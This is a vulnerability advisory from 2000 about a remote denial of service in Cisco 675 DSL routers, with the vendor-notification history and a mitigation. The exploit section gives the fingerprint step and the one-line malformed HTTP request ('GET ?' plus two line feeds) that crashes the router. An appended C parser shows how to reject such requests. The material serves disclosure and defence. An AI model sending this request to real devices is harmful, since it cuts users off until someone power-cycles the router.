Title: Cisco 675 Web Administration Denial of Service
Released by: CDI
Date: 28th November 2000
Device: Cisco 675 DSL Router
Class : Denial of Service (remote)
Vendor Notified: January 10th, 2000 (Yes folks, 11 months ago)
Patch Available: Nope - see below

                  ---------------------------------



    The Cisco 675 DSL routers with the Web Administration Interface enabled
can be crashed (hard) using a simple GET request. CBOS versions 2.0.x
through 2.2.x have been found to be vulnerable. The new CBOS 2.3.x has not
been tested, but there are no notes in the 2.3.x changelogs to indicate that
they've fixed this problem. Affected 675s were configured in PPP mode. The
'Web Administration Interface' is enabled by default in CBOS revisions 2.0.x
and 2.2.x.

The Cisco 67x series of DSL routers are produced and distributed for
specific telcos to offer to their clients and as such, the installation base
is quite large. (To hazard a guess, if just 20% of all Qwest DSL users are
using Cisco 675s, the installation base would exceed 25,000.) The DSL
adapters in this series include: Cisco 673, Cisco 675, Cisco 675e, Cisco
676, Cisco 677, and Cisco 678. This advisory applies specifically to the 675,
but other adapters in this series may have similar problems and should be
tested for vulnerability to this type of attack. I would be interested in
the results if someone has access to and can test the other adapters in this
series. The CBOS codebase is an acquired OS and as such has no relationship
at all to the main Cisco IOS codebase.



Fix First:

    Disable the Web Based Administration Interface in your 675 until a
    patch or CBOS revision is made available.

  Web Server Disable commands: (2.0.x or better)

    (CBOS 'enable' mode)
    cbos# set web disabled
    cbos# write
    cbos# reboot



Exploit:

    First find a 675 with the Web Admin server running.

Fingerprint:

    telnet vic.tim.ip.addr 80
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET / HTTP/1.0

    HTTP/1.0 401 Unauthorized
    Content-type: text/html
    WWW-Authenticate: Basic realm="CISCO_WEB"

    Unauthorized Access 401
    Connection closed by foreign host.

Now kill it:

    telnet vic.tim.ip.addr 80
    Trying vic.tim.ip.addr...
    Connected to vic.tim.ip.addr.
    Escape character is '^]'.
    GET ? [LF][LF]

    (your telnet session dies here, and so does the router)

Dead as a post:

    ping -c5 vic.tim.ip.addr
    PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
    5 packets transmitted, 0 packets received, 100% packet loss

The Cisco never recovers - it's hosed until the router is power-cycled. A
simple 'GET ? \n\n' is all it takes to kill the router. In case you're
wondering, I had meant to enter 'GET /', but my finger slipped on the shift
key. Neat eh?

VENDOR RESPONSE:

None, and I'll tell you why. (Warning, long rant ahead that has nothing to do
with the guts of this advisory.)

I first notified 'security-alert@cisco.com' in January of this year. Got an
immediate response and all seemed well. Then I didn't hear back from them for
a couple of months and promptly forgot all about this. Then in April the
'Cisco IOS Software TELNET Option Handling Vulnerability' (see
http://www.securityfocus.com/archive/1/56207) was announced. This
vulnerability was very similar to the Cisco 675 problem and I re-contacted
Cisco. They claimed they were "still working on replicating the error". Uh,
OK, whatever. I placed it on the back-burner and promptly forgot all about it
again because I didn't want to announce this vulnerability until a vendor
approved fix was available. (The installation base for this adapter is
humongous.)

Then in October of this year some discussion of a potential problem with the
Cisco 678 occurred on the VULN-DEV mailing list. A Cisco rep on the list had
the audacity to complain about prior-notification. (Never mind that VULN-DEV
is designed specifically to investigate potential vulnerabilities.) Anyway,
the issue was again brought before Cisco, and they again promised to address
this issue. The conversation on VULN-DEV prompted some private correspondence
with CORE SDI.

The last I heard from Cisco was actually by way of Iván Arce at CORE SDI, who
wanted more information regarding the Cisco 675 problem while he investigated
the CISCO IOS and its Web Admin bugs. (See CORE-20002510, BugTraq ID 1838.)
The vulnerabilities are strikingly similar even though IOS is a completely
separate codebase from CBOS. Anyway, CORE got word from Cisco PSIRT that they
would be addressing this issue by "mid November". Needless to say, this
hasn't happened yet. This week's discussion of vendor notification and
response times was just gravy.

It should also be noted that since January, Cisco has released at least 2
updates to the CBOS 2.x series without addressing this issue. (No mention of
it in their changelogs, although to be fair I've yet to have the opportunity
to test this bug against either 2.3.0 or 2.3.5.)

CDI
____________________________________
The Web Master's Net
http://www.thewebmasters.net/

"Ok spammer, I'll 'just hit delete'. You can be 'Delete'."
    -- Ron "SuperTroll" Ritzman, NANAE
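The request line that takes the router down in the Exploit section, 'GET ?' followed by two line feeds, is simply a request with no path and no HTTP version. The C below is an added example written for this page; it is not CDI's code and not Cisco's CBOS source, whose request handling the advisory does not describe. It shows how a small embedded HTTP front end can validate a request line and hand back a reject verdict (to be answered with 400 and a closed connection) on exactly that kind of input instead of proceeding with a missing target. The enum, struct and buffer limits are this example's own choices, and every sample input other than the two request lines quoted from the advisory is constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Verdicts for a received request line. Anything but REQ_OK should be answered
 * with "400 Bad Request" and the connection closed; URL handling code is never
 * reached with a missing or malformed target. (Example code, not CBOS.) */
enum req_status {
    REQ_OK = 0,
    REQ_BAD_METHOD,   /* empty method, or a byte that is not a token char */
    REQ_BAD_TARGET,   /* target missing, not origin-form "/...", or has ctl/space */
    REQ_BAD_VERSION,  /* something after the target that is not HTTP/d.d */
    REQ_TOO_LONG      /* request line longer than we are willing to buffer */
};

/* Parsed fields, each copied into a fixed buffer with a hard size limit
 * (sizes are this example's assumptions). */
struct request_line {
    char method[16];
    char target[256];
    char version[16];
};

#define MAX_REQUEST_LINE 1024

/* RFC 1945/2616 token characters: printable ASCII minus the separators. */
static int is_token_char(unsigned char c)
{
    if (c <= 0x20 || c >= 0x7f)
        return 0;
    return strchr("()<>@,;:\\\"/[]?={}", c) == NULL;
}

/* Copy n bytes of tok into dst; refuse (return -1) rather than truncate. */
static int copy_field(char *dst, size_t dstsz, const char *tok, size_t n)
{
    if (n >= dstsz)
        return -1;
    memcpy(dst, tok, n);
    dst[n] = '\0';
    return 0;
}

/* Validate and split one request line. The input may carry its CR/LF and any
 * following bytes; parsing stops at the first CR or LF. */
enum req_status parse_request_line(const char *line, struct request_line *out)
{
    const char *p = line;
    const char *end = line + strcspn(line, "\r\n");
    size_t len, i;

    memset(out, 0, sizeof *out);
    if ((size_t)(end - line) > MAX_REQUEST_LINE)
        return REQ_TOO_LONG;

    /* Method: one or more token characters followed by exactly one SP. */
    for (len = 0; p + len < end && is_token_char((unsigned char)p[len]); len++)
        ;
    if (len == 0 || copy_field(out->method, sizeof out->method, p, len) < 0)
        return REQ_BAD_METHOD;
    p += len;
    if (p >= end || *p != ' ')
        return REQ_BAD_TARGET;      /* "GET" alone, or junk glued to the method */
    p++;

    /* Request-target: origin-form only. It must start with '/' and contain no
     * whitespace or control bytes, so a bare "?" is rejected right here. */
    for (len = 0; p + len < end && p[len] != ' '; len++)
        ;
    if (len == 0 || p[0] != '/')
        return REQ_BAD_TARGET;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)p[i];
        if (c <= 0x20 || c >= 0x7f)
            return REQ_BAD_TARGET;
    }
    if (copy_field(out->target, sizeof out->target, p, len) < 0)
        return REQ_BAD_TARGET;
    p += len;

    /* HTTP-version is optional (RFC 1945 Simple-Request), but if anything
     * follows the target it must be exactly "HTTP/<digit>.<digit>". */
    if (p == end)
        return REQ_OK;
    p++;                            /* the single SP the loop stopped on */
    len = (size_t)(end - p);
    if (len != 8 || strncmp(p, "HTTP/", 5) != 0 ||
        !isdigit((unsigned char)p[5]) || p[6] != '.' || !isdigit((unsigned char)p[7]))
        return REQ_BAD_VERSION;
    copy_field(out->version, sizeof out->version, p, len);
    return REQ_OK;
}

/* Verdict only, for callers that just need accept/reject. */
enum req_status request_line_status(const char *line)
{
    struct request_line rl;
    return parse_request_line(line, &rl);
}

int main(void)
{
    /* Constructed samples: the first two are the advisory's request lines,
     * the rest probe neighbouring edge cases. */
    static const char *const samples[] = {
        "GET / HTTP/1.0\r\n", "GET ? \n\n", "GET /", "GET", "",
        "GET / HTTP/1.x", "GET /\t HTTP/1.0",
    };
    static const char *const names[] = {
        "REQ_OK", "REQ_BAD_METHOD", "REQ_BAD_TARGET", "REQ_BAD_VERSION", "REQ_TOO_LONG"
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu -> %s\n", i, names[request_line_status(samples[i])]);
    return 0;
}
```

The bare '?' is rejected by the origin-form rule (a target must begin with '/'), not by recognising that particular byte; the same check covers an empty target, a tab inside the target, and a line with nothing after the method. That generality is the property to look for in any parser sitting in front of a device that otherwise needs a power cycle to recover.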

(C) 1999-2000 All rights reserved.